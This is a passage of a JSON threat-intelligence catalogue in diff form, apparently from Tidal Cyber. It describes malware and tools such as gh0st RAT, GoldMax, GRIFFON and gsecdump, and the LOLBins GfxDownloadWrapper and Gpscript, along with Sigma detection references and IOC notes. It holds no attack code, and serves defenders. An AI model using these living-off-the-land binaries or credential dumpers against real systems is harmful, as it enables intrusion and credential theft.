c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_a58de0cf5f3e9dca\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_abe9d37302f8b1ae\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_acb3edda7b82982f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_aebc5a8535dd3184\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_b5d4c82c67b39358\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_b846bbf1e81ea3cf\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_babb2e8b8072ff3b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_bc75cebf5edbbc50\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_be91293cf20d4372\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c11f4d5f0bc4c592\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c4e5173126d31cf0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c4f600ffe34acc7b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c8634ed19e331cda\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_c9081e50bcffa972\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_ceddadac8a2b489e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d4406f0ad6ec2581\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d5877a2e0e6374b6\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_d8ca5f86add535ef\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_e8abe176c7b553b5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_eabb3ac2c517211f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_f8d8be8fea71e1a0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_fe5e116bb07c0629\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_fe73d2ebaa05fb95\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127153.inf_amd64_364f43f2a27f7bd7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127153.inf_amd64_3f3936d8dec668b8\\\n* c:\\windows\\system32\\driverstore\\filerepository\\k127793.inf_amd64_3ab7883eddccbf0f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129523.inf_amd64_32947eecf8f3e231\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126950.inf_amd64_fa7f56314967630d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126951.inf_amd64_94804e3918169543\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126973.inf_amd64_06dde156632145e3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki126974.inf_amd64_9168fc04b8275db9\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127005.inf_amd64_753576c4406c1193\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127018.inf_amd64_0f67ff47e9e30716\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127021.inf_amd64_0d68af55c12c7c17\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127171.inf_amd64_368f8c7337214025\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127176.inf_amd64_86c658cabfb17c9c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127390.inf_amd64_e1ccb879ece8f084\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127678.inf_amd64_8427d3a09f47dfc1\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127727.inf_amd64_cf8e31692f82192e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127807.inf_amd64_fc915899816dbc5d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki127850.inf_amd64_6ad8d99023b59fd5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki128602.inf_amd64_6ff790822fd674ab\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki128916.inf_amd64_3509e1eb83b83cfb\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129407.inf_amd64_f26f36ac54ce3076\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129633.inf_amd64_d9b8af875f664a8c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki129866.inf_amd64_e7cdca9882c16f55\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130274.inf_amd64_bafd2440fa1ffdd6\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130350.inf_amd64_696b7c6764071b63\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130409.inf_amd64_0d8d61270dfb4560\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130471.inf_amd64_26ad6921447aa568\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130624.inf_amd64_d85487143eec5e1a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130825.inf_amd64_ee3ba427c553f15f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki130871.inf_amd64_382f7c369d4bf777\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131064.inf_amd64_5d13f27a9a9843fa\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131176.inf_amd64_fb4fe914575fdd15\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131191.inf_amd64_d668106cb6f2eae0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki131622.inf_amd64_0058d71ace34db73\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132032.inf_amd64_f29660d80998e019\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132337.inf_amd64_223d6831ffa64ab1\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132535.inf_amd64_7875dff189ab2fa2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132544.inf_amd64_b8c1f31373153db4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132574.inf_amd64_54c9b905b975ee55\\\n* c:\\windows\\system32\\driverstore\\filerepository\\ki132869.inf_amd64_052eb72d070df60f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\kit126731.inf_amd64_1905c9d5f38631d9\\\n\n**Resources:**\n* [https://www.sothis.tech/author/jgalvez/](https://www.sothis.tech/author/jgalvez/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml)\n* IOC: [Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.](Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.)[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5186", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "396335cb-1404-44f1-9d73-387e468bc781", + "type": "similar" + } + ], + "uuid": "a83cfdbf-023a-4874-a3d8-9674149ceb53", + "value": "GfxDownloadWrapper" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "f26ae32b-07d4-4a4c-b63a-0012fc89fec0" + }, + "related": [ + { + "dest-uuid": "269ef8f5-35c8-44ba-afe4-63f4c6431427", + "type": "similar" + } + ], + "uuid": "f1c8627e-d1bb-4a15-997c-08d5c8626718", + "value": "Moudoor" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "6a9351cf-3ce8-48de-b102-e07697bf7134" + }, + "related": [ + { + "dest-uuid": "269ef8f5-35c8-44ba-afe4-63f4c6431427", + "type": "similar" + } + ], + "uuid": "d468e609-3469-4308-9fb9-b6ca8655a1b6", + "value": "Mydoor" + }, + { + "description": "[gh0st RAT](https://app.tidalcyber.com/software/269ef8f5-35c8-44ba-afe4-63f4c6431427) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.[[FireEye Hacking Team](https://app.tidalcyber.com/references/c1e798b8-6771-4ba7-af25-69c640321e40)][[Arbor Musical Chairs Feb 2018](https://app.tidalcyber.com/references/bddf44bb-7a0a-498b-9831-7b73cf9a582e)][[Nccgroup Gh0st April 2018](https://app.tidalcyber.com/references/4476aa0a-b1ef-4ac6-9e44-5721a0b3e92b)]", + "meta": { + "platforms": [ + "macOS", + "Windows" + ], + "software_attack_id": "S0032", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e343c1f1-458c-467b-bc4a-c1b97b2127e3", + "type": "used-by" + }, + { + "dest-uuid": "f1477581-d485-403f-a95f-c56bf88c5d1e", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "used-by" + }, + { + "dest-uuid": "2cc997b5-5076-4eef-9974-f54387614f46", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "type": "used-by" + }, + { + "dest-uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", + "type": "similar" + }, + { + "dest-uuid": "f1c8627e-d1bb-4a15-997c-08d5c8626718", + "type": "similar" + }, + { + "dest-uuid": "d468e609-3469-4308-9fb9-b6ca8655a1b6", + "type": "similar" + } + ], + "uuid": "269ef8f5-35c8-44ba-afe4-63f4c6431427", + "value": "gh0st RAT" + }, + { + "description": "", + "meta": { + "id": "cc8a6275-00b8-4186-bb7e-e4032e03e845" + }, + "related": [ + { + "dest-uuid": "09fdec78-5253-433d-8680-294ba6847be9", + "type": "similar" + } + ], + "uuid": "b7246af4-31b1-42b4-aafd-853a5fd9fbbf", + "value": "Trojan.GTALK" + }, + { + "description": "[GLOOXMAIL](https://app.tidalcyber.com/software/09fdec78-5253-433d-8680-294ba6847be9) is malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) that mimics legitimate Jabber/XMPP traffic. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0026", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "f2e8c7a1-cae1-45c4-baf0-6f21bdcbb2c2", + "type": "similar" + }, + { + "dest-uuid": "b7246af4-31b1-42b4-aafd-853a5fd9fbbf", + "type": "similar" + } + ], + "uuid": "09fdec78-5253-433d-8680-294ba6847be9", + "value": "GLOOXMAIL" + }, + { + "description": "GMER is a tool used to remove rootkits.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5033", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "83713f85-8b2f-4733-9fea-e6a1494d0bbb", + "value": "GMER" + }, + { + "description": "[Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) was used along with [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. [[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0249", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "b9799466-9dd7-4098-b2d6-f999ce50b9a8", + "type": "similar" + } + ], + "uuid": "348fdeb5-6a74-4803-ac6e-e0133ecd7263", + "value": "Gold Dragon" + }, + { + "description": "[GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) was discovered targeting organizations in China, being delivered with the \"Intelligent Tax\" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.[[Trustwave GoldenSpy June 2020](https://app.tidalcyber.com/references/2a27a2ea-2815-4d97-88c0-47a6e04e84f8)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0493", + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b9704a7d-feef-4af9-8898-5280f1686326", + "type": "similar" + } + ], + "uuid": "1b135393-c799-4698-a880-c6a86782adee", + "value": "GoldenSpy" + }, + { + "description": "[GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447).[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0597", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "b7010785-699f-412f-ba49-524da6033c76", + "type": "similar" + } + ], + "uuid": "4e8c58c5-443e-4f73-91e9-89146f04e307", + "value": "GoldFinder" + }, + { + "description": "[[FireEye SUNSHUTTLE Mar 2021](https://app.tidalcyber.com/references/1cdb8a1e-fbed-4db3-b273-5f8f45356dc1)]", + "meta": { + "id": "5ba7d15e-06cf-4fd9-8a89-4d4fea6f9b51" + }, + "related": [ + { + "dest-uuid": "b05a9763-4288-4656-bf4e-ba02bb8b35d6", + "type": "similar" + } + ], + "uuid": "c3ca0824-88bf-4489-bd93-7598044d1088", + "value": "SUNSHUTTLE" + }, + { + "description": "[GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a), and has likely been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least mid-2019. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[FireEye SUNSHUTTLE Mar 2021](https://app.tidalcyber.com/references/1cdb8a1e-fbed-4db3-b273-5f8f45356dc1)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0588", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "5c747acd-47f0-4c5a-b9e5-213541fc01e0", + "type": "similar" + }, + { + "dest-uuid": "c3ca0824-88bf-4489-bd93-7598044d1088", + "type": "similar" + } + ], + "uuid": "b05a9763-4288-4656-bf4e-ba02bb8b35d6", + "value": "GoldMax" + }, + { + "description": "[Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is a Windows backdoor and Trojan used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) and shares several similarities to another backdoor used by the group ([Denis](https://app.tidalcyber.com/software/df4002d2-f557-4f95-af7a-9a4582fb7068)). [Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is named for its impersonation of the legitimate Google Updater executable.[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0477", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "eac3d77f-2b7b-4599-ba74-948dc16633ad", + "type": "similar" + } + ], + "uuid": "a75855fd-2b6b-43d8-99a5-2be03b544f34", + "value": "Goopy" + }, + { + "description": "[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]", + "meta": { + "id": "4138af40-f244-4eca-8957-3523ef3ae312", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "acf4a502-2730-4b36-aea3-652420390977", + "type": "similar" + } + ], + "uuid": "34cc45e9-f8c3-4b2d-b8b5-ace1aec167b2", + "value": "Gpscript.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by group policy to process scripts\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\gpscript.exe\n* C:\\Windows\\SysWOW64\\gpscript.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/](https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_gpscript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml)\n* IOC: Scripts added in local group policy\n* IOC: Execution of Gpscript.exe after logon[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5113", + "source": "Tidal Cyber", + "tags": [ + "2ca5c5e4-ee7f-4698-84ec-ce04d2c1e9cc", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "34cc45e9-f8c3-4b2d-b8b5-ace1aec167b2", + "type": "similar" + } + ], + "uuid": "acf4a502-2730-4b36-aea3-652420390977", + "value": "Gpscript" + }, + { + "description": "[Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) has confirmed victims in Brazil, Mexico, Portugal, and Spain.[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)][[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0531", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "958b5d06-8bb0-4c5b-a2e7-0130fe654ac7", + "type": "similar" + } + ], + "uuid": "61d277f2-abdc-4f2b-b50a-10d0fe91e588", + "value": "Grandoreiro" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton \"is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs\" to exchange data with its operators. During a 2023 campaign, authorities also observed a HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.[[U.S. CISA SVR TeamCity Exploits December 2023](/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5077", + "source": "Tidal Cyber", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + } + ], + "uuid": "f77398ad-e043-4694-ade0-d6ea16a994e7", + "value": "GraphicalProton" + }, + { + "description": "[GravityRAT](https://app.tidalcyber.com/software/08cb425d-7b7a-41dc-a897-9057ce57fea9) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are \"TheMartian\" and \"The Invincible.\" According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. [[Talos GravityRAT](https://app.tidalcyber.com/references/2d7a1d72-cc9a-4b0b-a89a-e24ca836879b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0237", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1d1fce2f-0db5-402b-9843-4278a0694637", + "type": "similar" + } + ], + "uuid": "08cb425d-7b7a-41dc-a897-9057ce57fea9", + "value": "GravityRAT" + }, + { + "description": "[Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.[[Kaspersky Lamberts Toolkit April 2017](https://app.tidalcyber.com/references/2be23bfb-c6fb-455e-ae88-2ae910ccef60)][[Objective See Green Lambert for OSX Oct 2021](https://app.tidalcyber.com/references/fad94973-eafa-4fdb-b7aa-22c21d894f81)] ", + "meta": { + "platforms": [ + "iOS", + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0690", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "59c8a28c-200c-4565-9af1-cbdb24870ba0", + "type": "similar" + } + ], + "uuid": "f5691425-6690-4e5e-8304-3ede9d2f5a90", + "value": "Green Lambert" + }, + { + "description": "[GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) shares similarities with the [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware and is thought to be the successor of it.[[ESET GreyEnergy Oct 2018](https://app.tidalcyber.com/references/f3e70f41-6c22-465c-b872-a7ec5e6a3e67)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0342", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "308b3d68-a084-4dfb-885a-3125e1a9c1e8", + "type": "similar" + } + ], + "uuid": "f646e7f9-4d09-46f6-9831-54668fa20483", + "value": "GreyEnergy" + }, + { + "description": "[GRIFFON](https://app.tidalcyber.com/software/ad358082-d83a-4c22-81a1-6c34dd67af26) is a JavaScript backdoor used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff). [[SecureList Griffon May 2019](https://app.tidalcyber.com/references/42e196e4-42a7-427d-a69b-d78fa6375f8c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0417", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "04fc1842-f9e4-47cf-8cb8-5c61becad142", + "type": "similar" + } + ], + "uuid": "ad358082-d83a-4c22-81a1-6c34dd67af26", + "value": "GRIFFON" + }, + { + "description": "[GrimAgent](https://app.tidalcyber.com/software/c40a71d4-8592-4f82-8af5-18f763e52caf) is a backdoor that has been used before the deployment of [Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) ransomware since at least 2020; it is likely used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) and [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8).[[Group IB GrimAgent July 2021](https://app.tidalcyber.com/references/6b0dd676-3ea5-4b56-a27b-b1685787de02)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0632", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "c9b99d03-ff11-4a48-95f0-82660d582c25", + "type": "similar" + } + ], + "uuid": "c40a71d4-8592-4f82-8af5-18f763e52caf", + "value": "GrimAgent" + }, + { + "description": "Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.[[Symantec Play Ransomware April 19 2023](/references/a78613a5-ce17-4d11-8f2f-3e642cd7673c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5079", + "source": "Tidal Cyber", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "3ff9e020-8a7a-4c6f-a607-117ce9e436c5", + "value": "Grixba" + }, + { + "description": "[gsecdump](https://app.tidalcyber.com/software/5ffe662f-9da1-4b6f-ad3a-f296383e828c) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [[TrueSec Gsecdump](https://app.tidalcyber.com/references/ba1d07ed-2e18-4f5f-9d44-082530946f14)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0008", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + 